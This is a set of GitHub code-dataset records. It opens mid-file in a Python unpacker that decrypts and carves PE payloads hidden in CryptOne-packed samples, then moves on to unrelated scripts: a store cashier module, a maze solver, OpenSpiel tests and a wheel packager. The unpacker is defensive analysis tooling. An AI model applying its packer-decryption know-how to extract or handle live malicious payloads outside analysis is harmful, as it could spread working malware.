{hexlify(unpacked_data[:0x176])}')\n results = carve(unpacked_data)\n if results:\n if bs:\n self.logger.critical(f'Successfully unpacked {len(results)} file(s) block size: 0x{bs:02X}, skip: 0x{skip:02X}, add: 0x{const:08X} from resource {resource_name}')\n else:\n self.logger.critical(f'Successfully carved {len(results)} file(s) with add 0x{const:08X}')\n for result in results:\n carved_pe = result['data'] \n self.unpacked_pe = pefile.PE(data=carved_pe, fast_load=False) \n self.unpacked = carved_pe\n dump_path = self.dump_path(carved_pe)\n with open(dump_path, 'wb') as fp:\n self.logger.critical(f'Dumping to {dump_path}')\n fp.write(carved_pe)\n return True\n\n\n def unpack(self, path, dump=None):\n self.path = path\n self.pe = pefile.PE(self.path, fast_load=False)\n with open(path, 'rb') as fp:\n self.data = fp.read()\n\n #Find resource\n\n for name, _id, resdata in iter_resources(self.pe):\n \"\"\"\n if (int.from_bytes(resdata[:4], byteorder='little') < len(resdata) and\n int.from_bytes(resdata[:4], byteorder='little') < len(resdata) + 0x200):\n \"\"\"\n resname = f'{name}/{_id}'\n reslength = len(resdata) - 4 #First dword is payload length, remove from size\n #self.logger.debug(f'Processing resource {name}/{_id} length: {len(resdata):08X}')\n size = int.from_bytes(resdata[:4], byteorder='little')\n try:\n ratio = size/len(resdata)\n except ZeroDivisionError:\n continue\n if size == reslength:\n self.logger.info(f'Found resource potentially containing encrypted PE: {name}/{_id}')\n return self.decrypt_ciphertext(resdata[4:], resname)\n elif ratio > .20 and ratio < 1:\n \"\"\"\n in some samples a58567fe17db5d4ee201dfeaa2466e06\n the resource is copied over in blocks ignoring a few bytes of dead space between blocks\n In this sample 0x7B bytes from the resource are copied, then 3 are skipped\n We can determine the ratio of copy/skip by comparing the resource's actual size to the size\n specified in the first 4 bytes\n \"\"\"\n for frac in nearest_fractions(reslength, size, max_fractions=100): # Only try the 100 best approximations\n block_size = frac.denominator\n skip = frac.numerator - block_size\n for i in range(1,255):\n if block_size*i > 0x100:\n break\n self.logger.debug(f'Trying block copy with block size 0x{block_size*i:02X} and skip 0x{skip*i:02X}')\n ciphertext = self.block_copy(resdata[4:], block_size*i, skip*i)\n if self.decrypt_ciphertext(ciphertext, resname, bs=block_size*i, skip=skip*i):\n return True\n else:\n pass\n #self.logger.debug(f'Skipping resource {name}/{_id}')\n \n self.logger.error(\"Failed to find resource containing encrypted PE file\")\n return \n \n\n # Find the addition key. Solving seems to be a better method as long as the 0x24242424 prefix is constant\n # If that fails to prove correct I may need build this method back in as a backup\n \"\"\"\n for match in self.regex.finditer(self.data):\n try:\n const1 = int.from_bytes(match.group('const'), byteorder='little')\n self.logger.debug(f'const1: 0x{const1:08X}')\n rva = int.from_bytes(match.group('offset'), byteorder='little')\n self.logger.debug(f'RVA: 0x{rva:08X}')\n raw_offset = self.pe.get_offset_from_rva(rva - self.pe.OPTIONAL_HEADER.ImageBase)\n self.logger.debug(f'raw offset: 0x{raw_offset:08X}')\n const2 = int.from_bytes(self.data[raw_offset:raw_offset+4], byteorder='little')\n self.logger.debug(f'const2: 0x{const2:08X}')\n except:\n continue\n \"\"\"\n\n \nif __name__ == '__main__':\n options = parse_args()\n configure_logger(options.verbose)\n decryptor = Decryptor(options.dump_dir)\n if options.yara:\n import yara\n rule_path = os.path.join(repo_root, 'CryptOne', 'Classification_CryptOne.yar')\n rule = yara.compile(rule_path)\n for arg in options.files:\n for path in recursive_all_files(arg):\n if options.yara:\n if not rule.match(path):\n decryptor.logger.info(f'Skipping {path} - did not match {rule_path}')\n continue\n decryptor.logger.critical(f'Processing {path}')\n try:\n decryptor.unpack(path)\n except Exception as e:\n print(f'Exception processing {path}:')\n print(traceback.format_exc())\n \n","repo_name":"jhumble/Unpackers-and-Config-Extractors","sub_path":"CryptOne/unpack.py","file_name":"unpack.py","file_ext":"py","file_size_in_byte":10141,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"6927877931","text":"for _ in range(int(input())):\n n = int(input())\n s = input()\n d = ''\n for i in range(1, 100):\n if i%3 == 0:\n d+='F'\n if i%5 ==0:\n d+='B'\n\n if s in d:\n print('YES')\n else:\n print('NO')\n","repo_name":"Raffian-moin/Codeforces-solutions","sub_path":"codeforces/800/string/1796A_typical_interview_problem.py","file_name":"1796A_typical_interview_problem.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2884205371","text":"#!/usr/bin/en PYTHON\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 11 15:28:18 2015\n\n@author: combo\n\"\"\"\n\nfrom lxml import etree\n\n\nxmlFile = etree.parse(\"annuaire.xml\")\nracine = etree.Element(\"annuaire\")\npersonne1 = etree.SubElement(racine, \"personne\")\npersonne1.set(\"dpmt\",\"sciences\")\nnom1 = etree.SubElement(personne1,\"nom\")\nnom1.text = \"dupond\"\n\nfile_str= etree.tostring(racine, pretty_print = True)\nfile_str = \"annuaire.xml\"\n\n","repo_name":"nCombo/Python","sub_path":"pythonAndXml/creatXmlFileWithLxml.py","file_name":"creatXmlFileWithLxml.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15308218010","text":"import datetime\nimport re\nimport os\nfrom gercliente import *\nfrom gerestoque import *\n\ndef Data():\n # Formata a data sempre que necessário\n data_input = str(input(\"Digite a data (dd/mm/aaaa): \"))\n if (data_input[2] == '/' or data_input[5] == '/'):\n # Verifica se a entrada é uma string numérica de 8 dígitos\n return data_input\n else:\n if not re.match(r'^\\d{8}$', data_input):\n print(\"Data inválida\")\n return Data()\n else:\n # Converte a string de entrada em um objeto datetime\n try:\n data = datetime.datetime.strptime(data_input, '%d%m%Y')\n except ValueError:\n print(\"Data inválida\")\n return Data()\n else:\n # Formata a data para o formato desejado\n return data.strftime('%d/%m/%Y')\n\ndef menu_caixa():\n from main import vendas\n from main import codigos\n os.system('cls' if os.name == 'nt' else 'clear')\n print(\"-----------------------------\")\n print(\"MENU CAIXA\")\n print(\"\\nEscolha a opção desejada:\")\n print(\"Cadastrar vendas (1)\")\n print(\"Gestão Financeira (2)\")\n print(\"-----------------------------\")\n opcao = int(input(\"O que deseja fazer? \"))\n os.system('cls' if os.name == 'nt' else 'clear')\n\n if opcao == 1:\n gestao_financeira(vendas)\n elif opcao == 2:\n cadastrar_vendas()\n\ndef gestao_financeira(vendas):\n os.system('cls' if os.name == 'nt' else 'clear')\n saldoCaixa = 0\n num_item = 0\n print(\"-----------------------------\")\n print(\"GERENCIAMENTO DE CAIXA\\n\")\n data_formatada = Data()\n saldo_inicial = float(input(\"Digite o saldo inicial do caixa: \"))\n\n if any(item[\"Data\"] == data_formatada for item in vendas):\n indice_item = next(i for i, item in enumerate(vendas) if item[\"Data\"] == data_formatada)\n cpfs_cadastrados = vendas[indice_item][\"CPFs cadastrados\"]\n print(\"A data já possui vendas cadastradas.\")\n else:\n cpfs_cadastrados = {}\n\n N = int(input(\"Digite o número total de vendas do dia: \"))\n print(\"-----------------------------\")\n tot_venda = 0\n som_item = 0\n\n for i in range(1, N + 1):\n cpf = input(\"Digite o CPF do cliente (ou 's' para sair): \")\n if cpf == 's':\n break\n\n while not validar_cpf(cpf):\n print(\"CPF inválido!\")\n cpf = input(\"Digite o CPF do cliente: \")\n\n if cpf not in cpfs_cadastrados:\n cpfs_cadastrados[cpf] = []\n\n while True:\n cod_item = input(\"Código do item: \")\n try:\n valor = str(cod_item)\n if verificar_soma(valor):\n print(\"A soma dos dígitos é válida.\")\n break\n else:\n print(\"A soma dos dígitos não está no intervalo desejado. Tente novamente.\")\n except ValueError:\n print(\"Entrada inválida. Digite um valor inteiro.\")\n\n quant_item = int(input(\"Digite a quantidade de itens: \"))\n valor_un = float(input(\"Valor unitário do item em reais: \"))\n tot_venda += quant_item * valor_un\n som_item += quant_item\n num_item += quant_item\n cpfs_cadastrados[cpf].append({\n \"Código do item\": cod_item,\n \"Quantidade de itens\": quant_item,\n \"Valor unitário\": valor_un\n })\n print(\"-----------------------------\")\n\n print(\"-----------------------------\")\n print(\"RELATÓRIO DE MOVIMENTAÇÃO FINANCEIRA\")\n print(\"Data da movimentação:\", data_formatada)\n print(\"Saldo: R$\", saldo_inicial + tot_venda)\n print(\"Valor médio das vendas: R$\", tot_venda / som_item)\n print(\"Total das vendas:\", num_item, \"unidades\")\n print(\"-----------------------------\")\n vendas.append({\n \"Data\": data_formatada,\n \"CPFs cadastrados\": cpfs_cadastrados\n })\n print(\"CPFs cadastrados:\")\n for cpf, itens in cpfs_cadastrados.items():\n print(\"CPF:\", cpf)\n print(\"Itens:\")\n for item in itens:\n print(\" Código do item:\", item[\"Código do item\"])\n print(\" Quantidade de itens:\", item[\"Quantidade de itens\"])\n print(\" Valor unitário:\", item[\"Valor unitário\"])\n print(\"-----------------------------\")\n\n voltar = int(input(\"Teclar 0 para retornar à tela principal \"))\n if voltar != 0:\n print(\"Ação inválida\")\n voltar = int(input(\"Tecle 0 para voltar ao menu principal\"))\n else:\n from main import sisloja\n\ndef cadastrar_vendas():\n from main import vendas\n data_formatada = Data()\n indice_item = -1 # Inicialize a variável fora do loop\n\n for i, item in enumerate(vendas):\n if item[\"Data\"] == data_formatada:\n indice_item = i\n break \n\n if indice_item != -1:\n # Exibição do relatório de vendas\n print(\"CADASTRO DA VENDA\")\n print(\"Data da movimentação:\", vendas[indice_item][\"Data\"])\n cpfs_cadastrados = vendas[indice_item][\"CPFs cadastrados\"]\n print(\"CPFs cadastrados:\")\n for cpf, itens in cpfs_cadastrados.items():\n print(\"CPF:\", cpf)\n print(\"Itens:\")\n for item in itens:\n print(\" Código do item:\", item[\"Código do item\"])\n print(\" Quantidade de itens:\", item[\"Quantidade de itens\"])\n print(\" Valor unitário:\", item[\"Valor unitário\"])\n print(\"-----------------------------\")\n else:\n print(\"A data solicitada não está cadastrada ou não pode ser encontrada\")\n\n voltar = int(input(\"Teclar 0 para retornar à tela principal \"))\n if voltar != 0:\n print(\"Ação inválida\")\n voltar = int(input(\"Tecle 0 para voltar ao menu principal\"))\n else:\n from main import sisloja\n \n#Alex Euzebio (202301134358) TA\n#Emily Fernandes (@02303146681) TA\n#Erik Marcio Fernandes (202301135745) TA\n#Guilherme Duran Duran Gea (202302447171) TA\n#Maria Castello (202303180391) TA\n#Pedro Augusto Beserra da Silva (202304222223) TA\n","repo_name":"claytonjasilva/sisLoja","sub_path":"modulos/grupoA/gercaixa.py","file_name":"gercaixa.py","file_ext":"py","file_size_in_byte":6116,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36148038060","text":"laberinto = [\n [' ', 'X', 'X', 'X', 'X'], \n [' ', 'X', ' ', ' ', ' '],\n [' ', 'X', ' ', 'X', ' '], \n [' ', ' ', ' ', 'X', ' '], \n ['X', 'X', 'X', 'X', 'S']\n ]\ndef recorrer_laberinto():\n i=0\n j=0\n lista=[]\n posiciones_anteriores=[(0, 0)]\n while laberinto[i][j]!='S':\n if (laberinto[i+1][j]==' ' or laberinto[i+1][j]=='S') and (i+1, j) not in posiciones_anteriores:\n i+=1\n lista.append('abajo')\n posiciones_anteriores.append((i, j))\n \n elif laberinto[i][j+1]==' ' and (i, j+1) not in posiciones_anteriores:\n j+=1\n lista.append('derecha')\n posiciones_anteriores.append((i, j))\n\n elif laberinto[i-1][j]==' ' and (i-1, j) not in posiciones_anteriores:\n i-=1\n lista.append('arriba')\n posiciones_anteriores.append((i, j))\n \n elif laberinto[i][j-1]==' ' and (i, j-1) not in posiciones_anteriores:\n j-=1\n lista.append('izquierda')\n posiciones_anteriores.append((i, j))\n\n\n return lista\n\nprint(recorrer_laberinto())\n","repo_name":"Asierjunquera1/el-laberinto-final","sub_path":"laberinto.py","file_name":"laberinto.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30372150758","text":"\r\n\"\"\"\r\nContains various utility functions for PyTorch model training and saving.\r\n\"\"\"\r\nimport torch\r\nfrom pathlib import Path\r\n\r\ndef save_model(model,\r\n directory,\r\n model_name):\r\n \"\"\"save a model to a directory\r\n \r\n Args:\r\n model\r\n directory\r\n model_name\r\n example:\r\n save_model(model=model_0,\r\n target_dir=\"models\",\r\n model_name=\"05_going_modular_tingvgg_model.pth\")\r\n \"\"\"\r\n directory_path = Path(directory)\r\n directory_path.mkdir(parents=True,exist_ok=True)\r\n \r\n assert model_name.endswith(\"pth\") or model_name.endswith(\"th\") \r\n model_save_path = directory_path/model_name\r\n \r\n print(f\"saving model to {model_save_path}\")\r\n\r\n torch.save(obj=model.state_dict(),\r\n f=model_save_path)\r\n \r\n \r\n","repo_name":"pouya-alipour741/Courses","sub_path":"Pytorch/going_modular/going_modular/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34839253435","text":"import json\nfrom datetime import datetime\n\n'''\nThis is the unified class to contain records from Green, Yellow, and FHV\n'''\nclass TaxiTripRecordModel:\n TaxiService = \"\"\n VendorID = 0\n LpepPickupDateTime = 0\n LpepDropOffDateTime = 0\n PULocationID = 0\n DOLocationID = 0\n\n DATE_TIME_FORMAT = \"%Y-%m-%d %H:%M:%S\"\n\n\n '''\n Constructor to initialize all properties\n ''' \n def __init__(self, TaxiService: str, VendorID: int, LpepPickupDateTime: datetime, LpepDropOffDateTime: datetime, PULocationID: int, DOLocationID:int ):\n self.TaxiService = TaxiService\n self.VendorID = VendorID\n self.LpepPickupDateTime = LpepPickupDateTime\n self.LpepDropOffDateTime = LpepDropOffDateTime\n self.PULocationID = PULocationID\n self.DOLocationID = DOLocationID\n\n '''\n This function formats the object data as a tuple, used for database insert\n returns tuple\n '''\n def ToTuple(self):\n return (self.TaxiService, \n self.VendorID, \n self.LpepPickupDateTime.strftime(TaxiTripRecordModel.DATE_TIME_FORMAT), \n self.LpepDropOffDateTime.strftime(TaxiTripRecordModel.DATE_TIME_FORMAT), \n self.PULocationID, \n self.DOLocationID)\n\n '''\n This function takes tuple tup, and creates an object. This is used for database retreival\n returns TaxiTripRecordModel\n '''\n def FromTuple(tup: tuple):\n (TaxiService, VendorID, LpepPickupDateTime, LpepDropOffDateTime, PULocationID, DOLocationID) = tup\n if type(LpepDropOffDateTime) is str:\n LpepPickupDateTime = datetime.strptime(LpepPickupDateTime, TaxiTripRecordModel.DATE_TIME_FORMAT)\n LpepDropOffDateTime = datetime.strptime(LpepDropOffDateTime, TaxiTripRecordModel.DATE_TIME_FORMAT)\n\n return TaxiTripRecordModel(TaxiService,VendorID,LpepPickupDateTime,LpepDropOffDateTime,PULocationID,DOLocationID)\n\n '''\n Serialize the object for JSON REST response\n returns dictionary\n '''\n def ToDict(self):\n dictRep = { 'TaxiService': self.TaxiService,\n 'VendorID': self.VendorID,\n 'LpepPickupDateTime' : self.LpepPickupDateTime.strftime(self.DATE_TIME_FORMAT),\n 'LpepDropOffDateTime' : self.LpepDropOffDateTime.strftime(self.DATE_TIME_FORMAT),\n 'PULocationID' : self.PULocationID,\n 'DOLocationID' : self.DOLocationID\n } \n return dictRep\n\n","repo_name":"michstmatt/TripAnalytics","sub_path":"TripAnalyticsCode/CoreLib/SharedModels/TaxiTripRecordModel.py","file_name":"TaxiTripRecordModel.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379817387","text":"from absl.testing import absltest\n\nfrom open_spiel.python import games # pylint:disable=unused-import\nfrom open_spiel.python import policy\nfrom open_spiel.python import rl_environment\nfrom open_spiel.python.algorithms import cfr\nfrom open_spiel.python.algorithms import expected_game_score\nfrom open_spiel.python.algorithms import exploitability\nfrom open_spiel.python.algorithms import external_sampling_mccfr as external_mccfr\nfrom open_spiel.python.algorithms import outcome_sampling_mccfr as outcome_mccfr\nfrom open_spiel.python.games import dynamic_routing\nfrom open_spiel.python.games import dynamic_routing_utils\nimport pyspiel\n\n_NUM_ITERATION_CFR_TEST = 1\n\n\nclass DynamicRoutingGameTest(absltest.TestCase):\n\n def test_random_game(self):\n \"\"\"Tests basic API functions with the standard game tests.\"\"\"\n game = pyspiel.load_game(\"python_dynamic_routing\")\n pyspiel.random_sim_test(game, num_sims=10, serialize=False, verbose=True)\n\n def test_game_as_turn_based(self):\n \"\"\"Check the game can be converted to a turn-based game.\"\"\"\n game = pyspiel.load_game(\"python_dynamic_routing\")\n turn_based = pyspiel.convert_to_turn_based(game)\n pyspiel.random_sim_test(\n turn_based, num_sims=10, serialize=False, verbose=True)\n\n def test_game_as_turn_based_via_string(self):\n \"\"\"Check the game can be created as a turn-based game from a string.\"\"\"\n game = pyspiel.load_game(\n \"turn_based_simultaneous_game(game=python_dynamic_routing())\")\n pyspiel.random_sim_test(game, num_sims=10, serialize=False, verbose=True)\n\n def test_non_default_param_from_string(self):\n \"\"\"Check params can be given through string loading.\"\"\"\n game = pyspiel.load_game(\"python_dynamic_routing(max_num_time_step=5)\")\n self.assertEqual(game.max_game_length(), 5)\n\n def test_non_default_param_from_dict(self):\n \"\"\"Check params can be given through a dictionary.\"\"\"\n game = pyspiel.load_game(\"python_dynamic_routing\", {\"max_num_time_step\": 5})\n self.assertEqual(game.max_game_length(), 5)\n\n def test_action_consistency_convert_to_turn_based(self):\n \"\"\"Check if the sequential game is consistent with the game.\"\"\"\n game = pyspiel.load_game(\"python_dynamic_routing\")\n seq_game = pyspiel.convert_to_turn_based(game)\n state = game.new_initial_state()\n seq_state = seq_game.new_initial_state()\n self.assertEqual(\n state.legal_actions(seq_state.current_player()),\n seq_state.legal_actions(),\n msg=\"The sequential actions are not correct.\")\n\n def test_cfr_on_turn_based_game_with_exploitability(self):\n \"\"\"Check if CFR can be applied to the sequential game.\"\"\"\n game = pyspiel.load_game(\n \"python_dynamic_routing(max_num_time_step=5,time_step_length=1.0)\")\n seq_game = pyspiel.convert_to_turn_based(game)\n cfr_solver = cfr.CFRSolver(seq_game)\n for _ in range(_NUM_ITERATION_CFR_TEST):\n cfr_solver.evaluate_and_update_policy()\n exploitability.nash_conv(seq_game, cfr_solver.average_policy())\n\n def test_ext_mccfr_on_turn_based_game_with_exploitability(self):\n \"\"\"Check if external sampling MCCFR can be applied.\"\"\"\n game = pyspiel.load_game(\n \"python_dynamic_routing(max_num_time_step=5,time_step_length=1.0)\")\n seq_game = pyspiel.convert_to_turn_based(game)\n cfr_solver = external_mccfr.ExternalSamplingSolver(\n seq_game, external_mccfr.AverageType.SIMPLE)\n for _ in range(_NUM_ITERATION_CFR_TEST):\n cfr_solver.iteration()\n exploitability.nash_conv(seq_game, cfr_solver.average_policy())\n\n def test_int_mccfr_on_turn_based_game_with_exploitability(self):\n \"\"\"Check if outcome sampling MCCFR can be applied.\"\"\"\n game = pyspiel.load_game(\n \"python_dynamic_routing(max_num_time_step=5,time_step_length=1.0)\")\n seq_game = pyspiel.convert_to_turn_based(game)\n cfr_solver = outcome_mccfr.OutcomeSamplingSolver(seq_game)\n for _ in range(_NUM_ITERATION_CFR_TEST):\n cfr_solver.iteration()\n exploitability.nash_conv(seq_game, cfr_solver.average_policy())\n\n def test_creation_of_rl_environment(self):\n \"\"\"Check if RL environment can be created.\"\"\"\n game = pyspiel.load_game(\"python_dynamic_routing\")\n seq_game = pyspiel.convert_to_turn_based(game)\n rl_environment.Environment(seq_game)\n\n def test_vehicle_origin_outside_network(self):\n \"\"\"Check raise assertion if vehicle's origin is outside the Network.\"\"\"\n vehicles = [dynamic_routing_utils.Vehicle(\"I->O\", \"D->E\", 0)]\n with self.assertRaises(ValueError):\n dynamic_routing.DynamicRoutingGame(\n {\n \"max_num_time_step\": 10,\n \"time_step_length\": 0.5,\n \"players\": -1\n },\n vehicles=vehicles)\n\n def test_vehicle_destination_outside_network(self):\n \"\"\"Check raise assertion if vehicle's destination is outside the Network.\"\"\"\n vehicles = [dynamic_routing_utils.Vehicle(\"O->A\", \"E->F\", 0)]\n with self.assertRaises(ValueError):\n dynamic_routing.DynamicRoutingGame(\n {\n \"max_num_time_step\": 10,\n \"time_step_length\": 0.5,\n \"players\": -1\n },\n vehicles=vehicles)\n\n def test_multiple_departure_time_vehicle(self):\n \"\"\"Check that departure time can be define.\"\"\"\n vehicles = [\n dynamic_routing_utils.Vehicle(\"O->A\", \"D->E\", 0),\n dynamic_routing_utils.Vehicle(\"O->A\", \"D->E\", 0.5),\n dynamic_routing_utils.Vehicle(\"O->A\", \"D->E\", 1.0)\n ]\n game = dynamic_routing.DynamicRoutingGame(\n {\n \"max_num_time_step\": 10,\n \"time_step_length\": 0.5,\n \"players\": -1\n },\n vehicles=vehicles)\n pyspiel.random_sim_test(game, num_sims=10, serialize=False, verbose=True)\n\n def test_game_evolution_first_action_policy(self):\n \"\"\"Check game deterministic evolution under first action policy.\"\"\"\n # Test evolution of the game as expected (test value of the state).\n # test legal_actions().\n\n def test_observer_correct(self):\n \"\"\"Check that the observer is correclty updated.\"\"\"\n # Add test about observer and tensor being updated.\n\n def test_apply_actions_error_no_movement_with_negative_waiting_time(self):\n \"\"\"Check that a vehicle cannot choose to not move if it has to move.\"\"\"\n # Test apply_actions().\n\n def test_apply_actions_error_wrong_movement_with_negative_waiting_time(self):\n \"\"\"Check that a vehicle cannot choose to move to a not successor link.\"\"\"\n # Test apply_actions().\n\n def test_apply_actions_error_movement_with_positive_waiting_time(self):\n \"\"\"Check that a vehicle cannot choose to move if it cannot move yet.\"\"\"\n # Test apply_actions().\n\n def test_braess_paradox(self):\n \"\"\"Test that Braess paradox can be reproduced with the mean field game.\"\"\"\n num_player = 8\n braess_network = dynamic_routing_utils.Network(\n {\n \"O\": \"A\",\n \"A\": [\"B\", \"C\"],\n \"B\": [\"C\", \"D\"],\n \"C\": [\"D\"],\n \"D\": [\"E\"],\n \"E\": []\n },\n node_position={\n \"O\": (0, 0),\n \"A\": (1, 0),\n \"B\": (2, 1),\n \"C\": (2, -1),\n \"D\": (3, 0),\n \"E\": (4, 0)\n },\n bpr_a_coefficient={\n \"O->A\": 0,\n \"A->B\": 1.0,\n \"A->C\": 0,\n \"B->C\": 0,\n \"B->D\": 0,\n \"C->D\": 1.0,\n \"D->E\": 0\n },\n bpr_b_coefficient={\n \"O->A\": 1.0,\n \"A->B\": 1.0,\n \"A->C\": 1.0,\n \"B->C\": 1.0,\n \"B->D\": 1.0,\n \"C->D\": 1.0,\n \"D->E\": 1.0\n },\n capacity={\n \"O->A\": num_player,\n \"A->B\": num_player,\n \"A->C\": num_player,\n \"B->C\": num_player,\n \"B->D\": num_player,\n \"C->D\": num_player,\n \"D->E\": num_player\n },\n free_flow_travel_time={\n \"O->A\": 0,\n \"A->B\": 1.0,\n \"A->C\": 2.0,\n \"B->C\": 0.25,\n \"B->D\": 2.0,\n \"C->D\": 1.0,\n \"D->E\": 0\n })\n\n demand = [\n dynamic_routing_utils.Vehicle(\"O->A\", \"D->E\") for _ in range(num_player)\n ]\n game = dynamic_routing.DynamicRoutingGame(\n {\n \"time_step_length\": 0.125,\n \"max_num_time_step\": 40\n },\n network=braess_network,\n vehicles=demand)\n\n class TruePathPolicy(policy.Policy):\n\n def __init__(self, game):\n super().__init__(game, list(range(num_player)))\n self._path = {}\n\n def action_probabilities(self, state, player_id=None):\n assert player_id is not None\n legal_actions = state.legal_actions(player_id)\n if not legal_actions:\n return {dynamic_routing_utils.NO_POSSIBLE_ACTION: 1.0}\n elif len(legal_actions) == 1:\n return {legal_actions[0]: 1.0}\n else:\n if legal_actions[0] == 1:\n if self._path[player_id] in [\"top\", \"middle\"]:\n return {1: 1.0}\n elif self._path[player_id] == \"bottom\":\n return {2: 1.0}\n else:\n raise ValueError()\n elif legal_actions[0] == 3:\n if self._path[player_id] == \"top\":\n return {4: 1.0}\n elif self._path[player_id] == \"middle\":\n return {3: 1.0}\n else:\n raise ValueError()\n raise ValueError(f\"{legal_actions} is not correct.\")\n\n class NashEquilibriumBraess(TruePathPolicy):\n\n def __init__(self, game):\n super().__init__(game)\n for player_id in range(num_player):\n if player_id % 2 == 0:\n self._path[player_id] = \"middle\"\n if player_id % 4 == 1:\n self._path[player_id] = \"top\"\n if player_id % 4 == 3:\n self._path[player_id] = \"bottom\"\n\n class SocialOptimumBraess(NashEquilibriumBraess):\n\n def __init__(self, game):\n super().__init__(game)\n for player_id in range(num_player):\n if player_id % 2 == 0:\n self._path[player_id] = \"top\"\n if player_id % 2 == 1:\n self._path[player_id] = \"bottom\"\n\n ne_policy = NashEquilibriumBraess(game)\n # Debug issue with nash conv computation and uncomment yhe following line.\n # self.assertEqual(exploitability.nash_conv(game, ne_policy), 0.0)\n self.assertSequenceAlmostEqual(\n -expected_game_score.policy_value(game.new_initial_state(), ne_policy),\n [3.75] * num_player)\n\n so_policy = SocialOptimumBraess(game)\n # Debug issue with nash conv computation and uncomment the following line.\n # self.assertEqual(exploitability.nash_conv(game, so_policy), 0.125)\n self.assertSequenceAlmostEqual(\n -expected_game_score.policy_value(game.new_initial_state(), so_policy),\n [3.5] * num_player)\n\n\nif __name__ == \"__main__\":\n absltest.main()\n","repo_name":"deepmind/open_spiel","sub_path":"open_spiel/python/games/dynamic_routing_test.py","file_name":"dynamic_routing_test.py","file_ext":"py","file_size_in_byte":10846,"program_lang":"python","lang":"en","doc_type":"code","stars":3700,"dataset":"github-code","pt":"37"} +{"seq_id":"13982510595","text":"from CsmakeModules.ZipPackager import ZipPackager\nfrom CsmakeModules.Packager import Packager\nimport zipfile\nimport os.path\nimport StringIO\nimport hashlib\nimport json\nimport sys\n\nclass WheelPackage(ZipPackager):\n \"\"\"Purpose: Implements a PEP-427 compliant wheel packaging\n Implements: ZipPackager\n Type: Module Library: csmake-packaging\n Package Name Format: python\n Description: The implementation for WheelPackage crates a wheel using\n the ZipPackager implementation.\n - see: --list-type=ZipPackager and --list-type=Packager\n for more information\n Phases:\n package - Will build the package\n clean, package_clean - will delete the package\n Options:\n top-level - (OPTIONAL) Directory of the top level package directory\n Default is to use the package name\n package-version - the version for the package\n use-package-version - The package version will be used\n as a build number (see PEP-0427)\n maps - points to install map based sections that define\n how files shoudl be mapped into the package\n arch - (OPTIONAL) Specify the architecture (default is any)\n follow the PEP-425 Spec for values\n abi - (OPTIONAL) Specify the python abi (default is none)\n follow the PEP-425 Spec for values\n result - directory to put the results\n The package will be called:\n ----.whl\n If use-package-version is True:\n -----.whl\n NOTE: The \"python tag\" will be derived from the metadata classifiers.\n\n Joinpoints: (see Packaging module)\n Flowcontrol Advice: (see Packaging module)\n Install Map Definitions: (see Packaging module)\n\n Notes:\n Use of this module only makes sense with a python distribution\n Metadata classifiers have to include some flavor of:\n Programming Language :: Python\n\n \":: 2\" specified with \":: 2.7\" will be taken to mean py2 compatible\n \":: 2 :: Only\" specified with \":: 3 :: Only\" will ignore \"Only\"\n and specify a py2.py3 package, as the actual meaning is void\n i.e., multiple uses of 'Only' are invalid.\n See Also:\n csmake --list-type ZipPackager\n csmake --list-type Packager\n \"\"\"\n\n REQUIRED_OPTIONS = ['maps', 'result', 'package-version']\n PACKAGER_NAME_FORMAT = 'python'\n\n WHEEL_GENERATOR = \"csmake (WheelPackage 0.1.0)\"\n\n METAMAP_METHODS = {\n 'Name' : Packager.PackageNameMapper,\n 'Summary' : Packager.MetadataMapper,\n 'License' : Packager.METAMAP_METHODS['License'],\n 'Keywords' : Packager.MetadataMapper,\n 'Home-page' : Packager.MetadataMapper,\n '**python-tag' : Packager.AppendingClassifierMapper\n }\n\n METAMAP = {\n 'Name' : 'name',\n 'Summary' : 'description',\n 'Keywords' : 'keywords',\n 'Home-page' : 'homepage'\n }\n\n CLASSIFIER_MAPS = {\n '**python-tag' : {\n '' : (sys.maxint, None),\n 'Programming Language :: Python' : (9, 'py2.py3'),\n 'Programming Language :: Python :: 2' : (4, 'py2'),\n 'Programming Language :: Python :: 2.3' : (5, 'py23'),\n 'Programming Language :: Python :: 2.4' : (5, 'py24'),\n 'Programming Language :: Python :: 2.5' : (5, 'py25'),\n 'Programming Language :: Python :: 2.6' : (5, 'py26'),\n 'Programming Language :: Python :: 2.7' : (5, 'py27'),\n 'Programming Language :: Python :: 2 :: Only' : (1, 'py2'),\n 'Programming Language :: Python :: 3' : (4, 'py3'),\n 'Programming Language :: Python :: 3.0' : (5, 'py30'),\n 'Programming Language :: Python :: 3.1' : (5, 'py31'),\n 'Programming Language :: Python :: 3.2' : (5, 'py32'),\n 'Programming Language :: Python :: 3.3' : (5, 'py33'),\n 'Programming Language :: Python :: 3.4' : (5, 'py34'),\n 'Programming Language :: Python :: 3 :: Only' : (1, 'py3')\n },\n 'License' : Packager.CLASSIFIER_MAPS['License']\n }\n\n def _map_path_root(self, value, pathmaps, pathkeymaps):\n pathmaps[value] = ['%s.data/data/system/' % self.packageName]\n self.archiveRoot = ''\n pathkeymaps['root'] = []\n\n def _map_path_python_lib(self, value, pathmaps, pathkeymaps):\n pathmaps[value] = ['']\n pathkeymaps['python-lib'] = ['']\n\n def _map_path_python_script(self, value, pathmaps, pathkeymaps):\n pathmaps[value] = ['%s.data/scripts' % self.packageName]\n pathkeymaps['python-script'] = ['%s.data/scripts' % self.packageName]\n\n def _calculateFileNameAndVersioning(self):\n ZipPackager._calculateFileNameAndVersioning(self)\n self.version = self.metadata._getVersionWithFormat(\n ['%(epoch)s!', '%(primary)s' ],\n True,\n ['epoch', 'primary'],\n '+' )\n version = self.version\n self.filenameVersion = version\n self.packageVersion = self.options['package-version']\n self.usePackageVersion = 